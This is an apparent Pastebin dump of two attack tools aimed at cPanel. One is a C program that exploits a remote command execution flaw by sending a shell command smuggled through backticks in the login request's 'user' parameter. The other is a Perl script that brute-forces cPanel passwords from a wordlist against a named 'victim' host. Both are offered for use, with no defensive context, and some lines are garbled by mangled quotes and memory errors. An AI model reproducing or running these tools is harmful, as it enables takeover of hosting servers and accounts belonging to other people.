Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- cPanel <= 9x Remote Command Execution
- //headers
- #include //In/Out
- #include //sockets functions
- #include //memory functions
- #include //strlen,strcat,strcpy
- #pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"
- #define Port 2082 //port for connect to cPanel
- #define SIZE 1024 //buffer size to receive the data
- /*connect host:port*/
- SOCKET Conecta(char *Host, short puerto)
- {
- /*struct for make the socket*/
- WSADATA wsaData;
- SOCKET Winsock;//listener socket
- /*two structures for connect*/
- struct sockaddr_in Winsock_In;
- struct hostent *Ip;
- /*start the socket*/
- WSAStartup(MAKEWORD(2,2), &wsaData);
- /*make*/
- Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
- //check socket status
- if(Winsock==INVALID_SOCKET)
- {
- /*exit*/
- WSACleanup();
- return -1;
- }
- /*complete the struct*/
- Ip=gethostbyname(Host);
- Winsock_In.sin_port=htons(puerto);
- Winsock_In.sin_family=AF_INET;
- Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
- /*connect*/
- if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
- {
- /*end*/
- WSACleanup();
- return -1;
- }
- return Winsock;
- }
- /*MASTER FUNCTION*/
- int main(int argc, char *argv[])
- {
- /*the socket*/
- SOCKET sock;
- /*make the evil buffer to send the request*/
- char evil_request[]="GET /login/?user=|%22%60";
- char evil_request2[]="%60%22\r";
- char *evil;
- /*to receive the data*/
- char buf[SIZE];
- printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
- printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
- printf("\n-----------------------------------------------------\n");
- if(argc!=3)//cPanel_9x_rce.exe
- {
- printf("\n[+] Usage: %s \n",argv[0]);
- return 0;
- }
- printf("\n[+] Connecting %s:%d...",argv[1],Port);
- /*start the exploit*/
- sock=Conecta(argv[1],Port);//connect
- if(sock==-1)
- {
- printf("Error\n");
- return 1;
- }
- printf("OK");
- /*make the EVIL request*/
- evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
- strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");
- //sends it
- send(sock,evil,strlen(evil),0);
- buf[recv(sock,buf,SIZE,0)]='\0';
- //show the data
- printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);
- WSACleanup();
- LocalFree(buf);
- LocalFree(evil);
- return 0;
- }
- #!/usr/bin/perl
- # Cpanel Password Brute Forcer
- # —————————-
- # (c)jos_ali_joe
- # Perl Version ( low speed )
- # Oerginal Advisory :
- use IO :: Socket ;
- use LWP :: Simple ;
- use MIME :: Base64 ;
- $host = $ARGV [ 0 ];
- $user = $ARGV [ 1 ];
- $port = $ARGV [ 2 ];
- $list = $ARGV [ 3 ];
- $file = $ARGV [ 4 ];
- $url = “http://” . $host . “:” . $port ;
- if(@ ARGV < 3 ){
- print q (
- ###############################################################
- # Cpanel Password Brute Force Tool #
- ###############################################################
- # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
- #————————————————————-#
- # [Host] : victim Host (simorgh-ev.com) #
- # [User] : User Name (demo) #
- # [PORT] : Port of Cpanel (2082) #
- #[list] : File Of password list (list.txt) #
- # [File] : file for save password (password.txt) #
- # #
- ###############################################################
- # (c)jos_ali_joe / Indonesian Coder #
- ###############################################################
- );exit;}
- headx ();
- $numstart = “-1″ ;
- sub headx () {
- print q (
- ###############################################################
- # Cpanel Password Brute Force Tool #
- # (c)jos_ali_joe / Indonesian Coder #
- ###############################################################
- );
- open ( PASSFILE , “<$list” ) || die “[-] Can’t open the List of password file !” ;
- @ PASSWORDS = < PASSFILE >;
- close PASSFILE ;
- foreach my $P (@ PASSWORDS ) {
- chomp $P ;
- $passwd = $P ;
- print ”
- [~] Try Password : $passwd
- ” ;
- & brut ;
- };
- }
- sub brut () {
- $authx = encode_base64 ( $user . “:” . $passwd );
- print $authx ;
- my $sock = IO :: Socket :: INET -> new ( Proto => “tcp” , PeerAddr => “$host” , PeerPort => “$port” ) || print ”
- [-] Can not connect to the host” ;
- print $sock “GET / HTTP/1.1
- ” ;
- print $sock “Authorization: Basic $authx
- ” ;
- print $sock “Connection: Close
- ” ;
- read $sock , $answer , 128 ;
- close ( $sock );
- if ( $answer =~ / Moved /) {
- print ”
- [~] PASSWORD FOUND : $passwd
- ” ;
- exit();
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement